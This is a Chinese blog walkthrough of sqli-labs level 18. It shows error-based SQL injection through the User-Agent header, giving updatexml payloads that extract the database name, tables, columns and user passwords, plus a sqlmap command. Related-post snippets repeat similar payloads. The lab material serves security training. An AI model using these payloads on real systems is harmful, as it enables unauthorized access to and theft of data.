sqli-lab靶场18关基于post的头部信息报错注入

最新推荐文章于 2024-03-15 01:34:38 发布
最新推荐文章于 2024-03-15 01:34:38 发布
阅读量599 收藏
点赞数
分类专栏: sqli-labs靶场 文章标签: mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111390492
版权

知识点

$_SERVER['HTTP_USER_AGENT']

这是用来检查浏览页面的访问者在用什么浏览器.
  其中需要检查用户的 agent 字符串,它是浏览器发送的 HTTP 请求的一部分。
  如:var_dump($_SERVER['HTTP_USER_AGENT']);
  输出:string(65) "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Fire

通过查看源码看到,是一个insert的语句,我们通过构造updatexml xpath错误信息来返回数据
insert也是和update差不多,是一个插入数据
通过构造User-Agent

payload-header:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0or updatexml(1,concat(0x7e,database(),0x7e),1),,) #

在这里插入图片描述他爆出了我们的ip地址还有头部信息

第十八关

sqlmap方法:
针对于这一关我们也可以直接使用SQLmap来进行自动化注入:
首先,先将我们在bp中捕获的访问数据保存到1.txt文本中来,在使用SQLMAP进行注入

python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BTES

源码分析
可以看到这里定义了user_agent头部信息和IP地址
下边只输出了ip地址
然后下边有对uname和passwd都进行了过滤
在这里插入图片描述查看以下查询语句是用什么进行连接的
很明显是用and来连接的
在这里插入图片描述再看一下查询语句通过什么闭合的
在这里插入图片描述可以看到ip和uagent都是通过单引号闭合的
所以突破点找到了
然后咱们查询语句不论是报错还是双查询语句都要从user_agent头部信息中进行执行

一、判断注入点

发现他爆错信息是User-Agent:里面的信息,所以测试语句要在这里面进行
在这里插入图片描述所以我们要进行的闭合点是user_agent上

' and updatexml(1,concat(0x7e,(1),0x7e),1),1,1)#

在这里插入图片描述闭合点找出来了,就进行构造payload

二、构造payload

1.爆版本信息

' and updatexml(1,concat(0x2c,(version()),0x2c),1),1,1)#

在这里插入图片描述2.爆库

' and updatexml(1,concat(0x2c,(database()),0x2c),1),1,1)#

在这里插入图片描述3.爆表

' and updatexml(1,concat(0x2c,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x2c),1),1,1)#

在这里插入图片描述4.爆字段

' and updatexml(1,concat(0x2c,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x2c),1),1,1)#  (id)  
' and updatexml(1,concat(0x2c,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x2c),1),1,1)#   (username)
' and updatexml(1,concat(0x2c,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x2c),1),1,1)#   (password)

在这里插入图片描述5.爆数据

' and updatexml(1,concat(0x2c,(select username from users limit 0,1),0x2c),1),1,1)#

在这里插入图片描述' and updatexml(1,concat(0x2c,(select password from users limit 0,1),0x2c),1),1,1)#

24team
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【渗透测试】sqli-labs闯(18-24)
qq_43168364的博客
08-22 879
第十八:user-agent单引号字符型注入点 方法:在user-agent上进行xpath注入 这一我们输入用户名和密码之后给我们回显除了user-agent的信息,我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。 果然这里把user-agent插入了数据库,我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名,语法:' and ext......
sqli-labs靶场第十八
gou1791241251的博客
12-28 2054
十八有点特殊,后台对输入的账号和密码都调用了函数进行过滤了,所以要转换注入方式,尝试去请求头里面修改信息。 可以尝试cookie注入,user-agent注入,refer字段注入。最终在user-agent字段发现注入点,因为输入单引号或双引号时有显示。 这次注入前提是输入的账号密码正确才会去执行user-agent的sql语句。在此次例子用了注入的方式进行爆表和爆库。 ...
sqllab第十八笔记
最新发布
I_WORM的博客
03-15 485
构造payload:1' and extractvalue(1,concat(0x7e,database(),0x7e))='推测原始语句为 insert into 表名(字段1,字段2,...) values(数据1,数据2,...);这里显然不是一个查询语句,也不是一个update语句,可能是insert语句。突然想到这个位置好像不能用+,这里是不进行url解析的,换成空格试试。成功获取了数据库名字,获取敏感信息也是同样的操作;成功执行了exp(710),这里可以进行注入。说明这是一个UA注入
sqli-labs第十八详解
金 帛的博客
05-03 4556
SQL注入靶场第十八详解
SQL-labs的第18——http请求头注入(User-Agent)注入
qq_73393033的博客
07-21 396
并且,在判断闭合方式时,我们发现该网站会返回误,说明该网站适合使用注入。我们这次使用extractvalue函数进行注入。我们在截取的数据包中的User-Agent上加上一个'。它显示了User-Agent,我们大胆猜测注入点在这里。通过改变mid函数的后面两个参数可以改变返回的内容。很显然,这里的数据没有显示完全。账号:admin ,密码:admin。这说明闭合方式就是'。
sqli-labs靶场Less-18
songling515010475的专栏
08-27 113
POST /sqlilabs/Less-18/ HTTP/1.1 Host: 192.168.60.142:8080 User-Agent: ',updatexml(1,concat(0x7e,(select database())),1),1)-- qwe Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0..
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labtxt
07-22
sqli-lab1~10的通txt,其中包含了注入代码以及相注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
sqli-bypass靶场
11-10
sqli-bypass靶场
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
18.SQL注入
Steven的博客
07-21 137
1.SQL注入 SQL注入(SQL Injection)是指应用程序对用户输入数据的合法性没有判断、没有过滤,攻击者可以在应用程序中通过表单提交特殊的字符串,该特殊字符串会改变SQL的运行结果,从而在管理员毫不知情的情况下实现非法操作,以此来实现欺骗数据库执行非授权的任意查询。 2.特性 广泛性:任何一个基于SQL语言的数据库都可能受到SQL注入攻击。很多开发人员都为了省事不对表单参数进行校验。 隐蔽性:SQL注入语句一般都嵌入在普通的HTTP请求中,很难与正常语句区分开,SQL注入也有很多变种。 操作性:
sqli-labs 18 基于http头中的参数注入
devilare的博客
01-18 263
sqli-labs-master/Less-18 来到18,跟前几唯一的不同点就是多出一行提示 尝试admin登录查看源码发现 $uagent = $_SERVER[‘HTTP_USER_AGENT’]; $IP = SERVER[′REMOTEADDR′];echo"<br>";echo′YourIPADDRESSis:′._SERVER['REMOTE_ADDR']; echo "<br>"; echo 'Your IP ADDRESS is: ' .S​ERVER[′R
sqli-lab18和22详解
cangyu51462的博客
05-01 473
sqli-lab18和22详解
sqli-labs(18-22)
ximo的博客
02-03 215
目录Less-18Less-19Less-20Less-21Less-22 Less-18 输入正确的用户名(admin),密码(admin),登录成功,并返回User-Agent信息: 根据卡描述,也知道其为User-Agent头注入;这里使用火狐浏览器的插件(Modify Headers),或者burp suite抓包进行User-Agent头注入。 根据上图的sql语句信息,发现分别返回User-Agent、IP地址和username, 所以我们在构造sql语句时,需要满足三个注入信息,这里我们
sqli-labs--------第18
wyzhxhn的博客
11-10 1206
sql插入语句 User-Agent
sqli-labs/Less-18解题时注入类型判断的一些见解
m0_71299382的博客
11-19 196
sqli-labs于18的一些见解
sqli-labs基础篇 第18~22
Lucky小小吴的小屋
01-23 2353
sqli-labs基础篇 第18~22,主要学习内容:burp抓包、数据包修改
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值